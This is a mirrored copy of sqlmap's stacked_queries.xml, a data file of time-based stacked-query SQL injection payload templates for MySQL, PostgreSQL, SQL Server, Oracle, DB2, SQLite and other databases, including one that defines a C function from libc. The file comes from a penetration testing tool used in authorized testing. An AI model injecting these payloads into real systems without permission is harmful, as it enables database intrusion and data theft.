Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/data/xml/payloads/stacked_queries.xml
2992 views
1
<?xml version="1.0" encoding="UTF-8"?>
2
3
<root>
4
<!-- Stacked queries tests -->
5
<test>
6
<title>MySQL &gt;= 5.0.12 stacked queries (comment)</title>
7
<stype>4</stype>
8
<level>2</level>
9
<risk>1</risk>
10
<clause>1-8</clause>
11
<where>1</where>
12
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
13
<request>
14
<payload>;SELECT SLEEP([SLEEPTIME])</payload>
15
<comment>#</comment>
16
</request>
17
<response>
18
<time>[SLEEPTIME]</time>
19
</response>
20
<details>
21
<dbms>MySQL</dbms>
22
<dbms_version>&gt;= 5.0.12</dbms_version>
23
</details>
24
</test>
25
26
<test>
27
<title>MySQL &gt;= 5.0.12 stacked queries</title>
28
<stype>4</stype>
29
<level>3</level>
30
<risk>1</risk>
31
<clause>1-8</clause>
32
<where>1</where>
33
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
34
<request>
35
<payload>;SELECT SLEEP([SLEEPTIME])</payload>
36
</request>
37
<response>
38
<time>[SLEEPTIME]</time>
39
</response>
40
<details>
41
<dbms>MySQL</dbms>
42
<dbms_version>&gt;= 5.0.12</dbms_version>
43
</details>
44
</test>
45
46
<test>
47
<title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)</title>
48
<stype>4</stype>
49
<level>3</level>
50
<risk>1</risk>
51
<clause>1-8</clause>
52
<where>1</where>
53
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
54
<request>
55
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
56
<comment>#</comment>
57
</request>
58
<response>
59
<time>[SLEEPTIME]</time>
60
</response>
61
<details>
62
<dbms>MySQL</dbms>
63
<dbms_version>&gt;= 5.0.12</dbms_version>
64
</details>
65
</test>
66
67
<test>
68
<title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP)</title>
69
<stype>4</stype>
70
<level>4</level>
71
<risk>1</risk>
72
<clause>1-8</clause>
73
<where>1</where>
74
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
75
<request>
76
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
77
</request>
78
<response>
79
<time>[SLEEPTIME]</time>
80
</response>
81
<details>
82
<dbms>MySQL</dbms>
83
<dbms_version>&gt;= 5.0.12</dbms_version>
84
</details>
85
</test>
86
87
<test>
88
<title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)</title>
89
<stype>4</stype>
90
<level>3</level>
91
<risk>2</risk>
92
<clause>1-8</clause>
93
<where>1</where>
94
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
95
<request>
96
<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
97
<comment>#</comment>
98
</request>
99
<response>
100
<time>[DELAYED]</time>
101
</response>
102
<details>
103
<dbms>MySQL</dbms>
104
</details>
105
</test>
106
107
<test>
108
<title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK)</title>
109
<stype>4</stype>
110
<level>5</level>
111
<risk>2</risk>
112
<clause>1-8</clause>
113
<where>1</where>
114
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
115
<request>
116
<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
117
</request>
118
<response>
119
<time>[DELAYED]</time>
120
</response>
121
<details>
122
<dbms>MySQL</dbms>
123
</details>
124
</test>
125
126
<test>
127
<title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>
128
<stype>4</stype>
129
<level>1</level>
130
<risk>1</risk>
131
<clause>1-8</clause>
132
<where>1</where>
133
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
134
<request>
135
<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
136
<comment>--</comment>
137
</request>
138
<response>
139
<time>[SLEEPTIME]</time>
140
</response>
141
<details>
142
<dbms>PostgreSQL</dbms>
143
<dbms_version>&gt; 8.1</dbms_version>
144
</details>
145
</test>
146
147
<test>
148
<title>PostgreSQL &gt; 8.1 stacked queries</title>
149
<stype>4</stype>
150
<level>4</level>
151
<risk>1</risk>
152
<clause>1-8</clause>
153
<where>1</where>
154
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
155
<request>
156
<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
157
</request>
158
<response>
159
<time>[SLEEPTIME]</time>
160
</response>
161
<details>
162
<dbms>PostgreSQL</dbms>
163
<dbms_version>&gt; 8.1</dbms_version>
164
</details>
165
</test>
166
167
<test>
168
<title>PostgreSQL stacked queries (heavy query - comment)</title>
169
<stype>4</stype>
170
<level>2</level>
171
<risk>2</risk>
172
<clause>1-8</clause>
173
<where>1</where>
174
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
175
<request>
176
<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
177
<comment>--</comment>
178
</request>
179
<response>
180
<time>[DELAYED]</time>
181
</response>
182
<details>
183
<dbms>PostgreSQL</dbms>
184
</details>
185
</test>
186
187
<test>
188
<title>PostgreSQL stacked queries (heavy query)</title>
189
<stype>4</stype>
190
<level>5</level>
191
<risk>2</risk>
192
<clause>1-8</clause>
193
<where>1</where>
194
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
195
<request>
196
<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
197
</request>
198
<response>
199
<time>[DELAYED]</time>
200
</response>
201
<details>
202
<dbms>PostgreSQL</dbms>
203
</details>
204
</test>
205
206
<test>
207
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>
208
<stype>4</stype>
209
<level>3</level>
210
<risk>1</risk>
211
<clause>1-8</clause>
212
<where>1</where>
213
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
214
<request>
215
<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
216
<comment>--</comment>
217
</request>
218
<response>
219
<time>[SLEEPTIME]</time>
220
</response>
221
<details>
222
<dbms>PostgreSQL</dbms>
223
<dbms_version>&lt; 8.2</dbms_version>
224
<os>Linux</os>
225
</details>
226
</test>
227
228
<test>
229
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
230
<stype>4</stype>
231
<level>5</level>
232
<risk>1</risk>
233
<clause>1-8</clause>
234
<where>1</where>
235
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
236
<request>
237
<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
238
</request>
239
<response>
240
<time>[SLEEPTIME]</time>
241
</response>
242
<details>
243
<dbms>PostgreSQL</dbms>
244
<dbms_version>&lt; 8.2</dbms_version>
245
<os>Linux</os>
246
</details>
247
</test>
248
249
<test>
250
<title>Microsoft SQL Server/Sybase stacked queries (comment)</title>
251
<stype>4</stype>
252
<level>1</level>
253
<risk>1</risk>
254
<clause>1-8</clause>
255
<where>1</where>
256
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
257
<request>
258
<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
259
<comment>--</comment>
260
</request>
261
<response>
262
<time>[SLEEPTIME]</time>
263
</response>
264
<details>
265
<dbms>Microsoft SQL Server</dbms>
266
<dbms>Sybase</dbms>
267
</details>
268
</test>
269
270
<test>
271
<title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
272
<stype>4</stype>
273
<level>2</level>
274
<risk>1</risk>
275
<clause>1-8</clause>
276
<where>1</where>
277
<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
278
<request>
279
<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
280
<comment>--</comment>
281
</request>
282
<response>
283
<time>[SLEEPTIME]</time>
284
</response>
285
<details>
286
<dbms>Microsoft SQL Server</dbms>
287
<dbms>Sybase</dbms>
288
</details>
289
</test>
290
291
<test>
292
<title>Microsoft SQL Server/Sybase stacked queries</title>
293
<stype>4</stype>
294
<level>4</level>
295
<risk>1</risk>
296
<clause>1-8</clause>
297
<where>1</where>
298
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
299
<request>
300
<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
301
</request>
302
<response>
303
<time>[SLEEPTIME]</time>
304
</response>
305
<details>
306
<dbms>Microsoft SQL Server</dbms>
307
<dbms>Sybase</dbms>
308
</details>
309
</test>
310
311
<test>
312
<title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
313
<stype>4</stype>
314
<level>5</level>
315
<risk>1</risk>
316
<clause>1-8</clause>
317
<where>1</where>
318
<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
319
<request>
320
<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
321
</request>
322
<response>
323
<time>[SLEEPTIME]</time>
324
</response>
325
<details>
326
<dbms>Microsoft SQL Server</dbms>
327
<dbms>Sybase</dbms>
328
</details>
329
</test>
330
331
<test>
332
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
333
<stype>4</stype>
334
<level>1</level>
335
<risk>1</risk>
336
<clause>1-8</clause>
337
<where>1</where>
338
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
339
<request>
340
<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
341
<comment>--</comment>
342
</request>
343
<response>
344
<time>[SLEEPTIME]</time>
345
</response>
346
<details>
347
<dbms>Oracle</dbms>
348
</details>
349
</test>
350
351
<test>
352
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
353
<stype>4</stype>
354
<level>4</level>
355
<risk>1</risk>
356
<clause>1-8</clause>
357
<where>1</where>
358
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
359
<request>
360
<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
361
</request>
362
<response>
363
<time>[SLEEPTIME]</time>
364
</response>
365
<details>
366
<dbms>Oracle</dbms>
367
</details>
368
</test>
369
370
<test>
371
<title>Oracle stacked queries (heavy query - comment)</title>
372
<stype>4</stype>
373
<level>2</level>
374
<risk>2</risk>
375
<clause>1-8</clause>
376
<where>1</where>
377
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
378
<request>
379
<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
380
<comment>--</comment>
381
</request>
382
<response>
383
<time>[DELAYED]</time>
384
</response>
385
<details>
386
<dbms>Oracle</dbms>
387
</details>
388
</test>
389
390
<test>
391
<title>Oracle stacked queries (heavy query)</title>
392
<stype>4</stype>
393
<level>5</level>
394
<risk>2</risk>
395
<clause>1-8</clause>
396
<where>1</where>
397
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
398
<request>
399
<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
400
</request>
401
<response>
402
<time>[DELAYED]</time>
403
</response>
404
<details>
405
<dbms>Oracle</dbms>
406
</details>
407
</test>
408
409
<test>
410
<title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
411
<stype>4</stype>
412
<level>4</level>
413
<risk>1</risk>
414
<clause>1-8</clause>
415
<where>1</where>
416
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
417
<request>
418
<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
419
<comment>--</comment>
420
</request>
421
<response>
422
<time>[SLEEPTIME]</time>
423
</response>
424
<details>
425
<dbms>Oracle</dbms>
426
</details>
427
</test>
428
429
<test>
430
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
431
<stype>4</stype>
432
<level>5</level>
433
<risk>1</risk>
434
<clause>1-8</clause>
435
<where>1</where>
436
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
437
<request>
438
<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
439
</request>
440
<response>
441
<time>[SLEEPTIME]</time>
442
</response>
443
<details>
444
<dbms>Oracle</dbms>
445
</details>
446
</test>
447
448
<test>
449
<title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
450
<stype>4</stype>
451
<level>5</level>
452
<risk>1</risk>
453
<clause>1-8</clause>
454
<where>1</where>
455
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
456
<request>
457
<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
458
<comment>--</comment>
459
</request>
460
<response>
461
<time>[SLEEPTIME]</time>
462
</response>
463
<details>
464
<dbms>Oracle</dbms>
465
</details>
466
</test>
467
468
<test>
469
<title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
470
<stype>4</stype>
471
<level>5</level>
472
<risk>1</risk>
473
<clause>1-8</clause>
474
<where>1</where>
475
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
476
<request>
477
<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
478
</request>
479
<response>
480
<time>[SLEEPTIME]</time>
481
</response>
482
<details>
483
<dbms>Oracle</dbms>
484
</details>
485
</test>
486
487
<test>
488
<title>IBM DB2 stacked queries (heavy query - comment)</title>
489
<stype>4</stype>
490
<level>3</level>
491
<risk>2</risk>
492
<clause>1-8</clause>
493
<where>1</where>
494
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
495
<request>
496
<payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
497
<comment>--</comment>
498
</request>
499
<response>
500
<time>[DELAYED]</time>
501
</response>
502
<details>
503
<dbms>IBM DB2</dbms>
504
</details>
505
</test>
506
507
<test>
508
<title>IBM DB2 stacked queries (heavy query)</title>
509
<stype>4</stype>
510
<level>5</level>
511
<risk>2</risk>
512
<clause>1-8</clause>
513
<where>1</where>
514
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
515
<request>
516
<payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
517
</request>
518
<response>
519
<time>[DELAYED]</time>
520
</response>
521
<details>
522
<dbms>IBM DB2</dbms>
523
</details>
524
</test>
525
526
<test>
527
<title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>
528
<stype>4</stype>
529
<level>3</level>
530
<risk>2</risk>
531
<clause>1-8</clause>
532
<where>1</where>
533
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
534
<request>
535
<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
536
<comment>--</comment>
537
</request>
538
<response>
539
<time>[DELAYED]</time>
540
</response>
541
<details>
542
<dbms>SQLite</dbms>
543
<dbms_version>&gt; 2.0</dbms_version>
544
</details>
545
</test>
546
547
<test>
548
<title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
549
<stype>4</stype>
550
<level>5</level>
551
<risk>2</risk>
552
<clause>1-8</clause>
553
<where>1</where>
554
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
555
<request>
556
<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
557
</request>
558
<response>
559
<time>[DELAYED]</time>
560
</response>
561
<details>
562
<dbms>SQLite</dbms>
563
<dbms_version>&gt; 2.0</dbms_version>
564
</details>
565
</test>
566
567
<test>
568
<title>Firebird stacked queries (heavy query - comment)</title>
569
<stype>4</stype>
570
<level>4</level>
571
<risk>2</risk>
572
<clause>1-8</clause>
573
<where>1</where>
574
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
575
<request>
576
<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
577
<comment>--</comment>
578
</request>
579
<response>
580
<time>[DELAYED]</time>
581
</response>
582
<details>
583
<dbms>Firebird</dbms>
584
<dbms_version>&gt;= 2.0</dbms_version>
585
</details>
586
</test>
587
588
<test>
589
<title>Firebird stacked queries (heavy query)</title>
590
<stype>4</stype>
591
<level>5</level>
592
<risk>2</risk>
593
<clause>1-8</clause>
594
<where>1</where>
595
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
596
<request>
597
<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
598
</request>
599
<response>
600
<time>[DELAYED]</time>
601
</response>
602
<details>
603
<dbms>Firebird</dbms>
604
<dbms_version>&gt;= 2.0</dbms_version>
605
</details>
606
</test>
607
608
<test>
609
<title>SAP MaxDB stacked queries (heavy query - comment)</title>
610
<stype>4</stype>
611
<level>4</level>
612
<risk>2</risk>
613
<clause>1-8</clause>
614
<where>1</where>
615
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
616
<request>
617
<payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
618
<comment>--</comment>
619
</request>
620
<response>
621
<time>[DELAYED]</time>
622
</response>
623
<details>
624
<dbms>SAP MaxDB</dbms>
625
</details>
626
</test>
627
628
<test>
629
<title>SAP MaxDB stacked queries (heavy query)</title>
630
<stype>4</stype>
631
<level>5</level>
632
<risk>2</risk>
633
<clause>1-8</clause>
634
<where>1</where>
635
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
636
<request>
637
<payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
638
</request>
639
<response>
640
<time>[DELAYED]</time>
641
</response>
642
<details>
643
<dbms>SAP MaxDB</dbms>
644
</details>
645
</test>
646
647
<test>
648
<title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>
649
<stype>4</stype>
650
<level>4</level>
651
<risk>2</risk>
652
<clause>1-8</clause>
653
<where>1</where>
654
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
655
<request>
656
<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
657
<comment>--</comment>
658
</request>
659
<response>
660
<time>[SLEEPTIME]</time>
661
</response>
662
<details>
663
<dbms>HSQLDB</dbms>
664
<dbms_version>&gt;= 1.7.2</dbms_version>
665
</details>
666
</test>
667
668
<test>
669
<title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>
670
<stype>4</stype>
671
<level>5</level>
672
<risk>2</risk>
673
<clause>1-8</clause>
674
<where>1</where>
675
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
676
<request>
677
<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
678
</request>
679
<response>
680
<time>[SLEEPTIME]</time>
681
</response>
682
<details>
683
<dbms>HSQLDB</dbms>
684
<dbms_version>&gt;= 1.7.2</dbms_version>
685
</details>
686
</test>
687
688
<test>
689
<title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>
690
<stype>4</stype>
691
<level>4</level>
692
<risk>2</risk>
693
<clause>1-8</clause>
694
<where>1</where>
695
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
696
<request>
697
<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
698
<comment>--</comment>
699
</request>
700
<response>
701
<time>[SLEEPTIME]</time>
702
</response>
703
<details>
704
<dbms>HSQLDB</dbms>
705
<dbms_version>&gt;= 2.0</dbms_version>
706
</details>
707
</test>
708
709
<test>
710
<title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>
711
<stype>4</stype>
712
<level>5</level>
713
<risk>2</risk>
714
<clause>1-8</clause>
715
<where>1</where>
716
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
717
<request>
718
<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
719
</request>
720
<response>
721
<time>[SLEEPTIME]</time>
722
</response>
723
<details>
724
<dbms>HSQLDB</dbms>
725
<dbms_version>&gt;= 2.0</dbms_version>
726
</details>
727
</test>
728
<!-- TODO: if possible, add payload for Microsoft Access -->
729
<!-- End of stacked queries tests -->
730
</root>
731
732